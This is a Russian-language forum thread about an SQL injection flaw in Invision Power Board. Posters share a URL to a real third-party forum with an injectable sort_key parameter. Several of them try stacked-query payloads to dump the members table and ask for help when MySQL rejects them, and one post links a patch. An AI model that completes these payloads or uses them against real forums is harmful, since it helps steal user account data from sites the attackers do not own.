Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
SQL инъекция в Invision Power Board
 
Обсуждение статьи SQL инъекция в Invision Power Board
 

А че, работает вот например http://www.zone-ultima.u9.ru/forum/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[%20Troble%20here%20]

 
вот маленький вопрос..
есть запрос
mySQL query error: SELECT * from ipb_topics WHERE forum_id=1 and approved=1 and (last_post > 0 OR pinned=1) ORDER BY pinned DESC, select * from ipb_users where id=1 DESC LIMIT 0,15
здесь после запятой, после ...pinned DESC вместо select * from ipb_users where id=1 и перед DESC LIMIT 0,15 можно вставлять свой запрос..
как его сформировать, чтобы вот выполнить вот этот select * from ipb_users... ?
 
Да.. И как же оно устраняется в IPB 1.2? А то патчик-то для 1.3
 
Всё, нашёл.
http://www.ibresource.ru/forums/index.php?showtopic=2909
 
Нихрена не понимаю вроде если сделать так
posts DESC LIMIT 0,25  ; SELECT * FROM ibf_members ORDER BY name

то сам вопрос выглядит таким образом

SELECT * from ibf_topics WHERE forum_id=1 and approved=1 and (last_post > 0 OR pinned=1) ORDER BY pinned DESC, posts DESC LIMIT 0,25  ; SELECT * FROM ibf_members ORDER BY name DESC LIMIT 0,25

вроде синтаксис правильный,  а не работает, даже если попытать слить в файл txt результат запроса все равно нихрена.

Кто-то подскажет где ошибка, что в  ДНК это и так знаю  [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG]

никак не могу разобраться
 
Это то что он выдает

mySQL error: You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near '; SELECT * FROM ibf_members ORDER BY name DESC LIMIT 0,25' at l
mySQL error code:
 
А разабрался кто-нить всё-таки как просмотреть ibf_members? Может подскажете? Очень нуна :)
Страницы: 1
Читают тему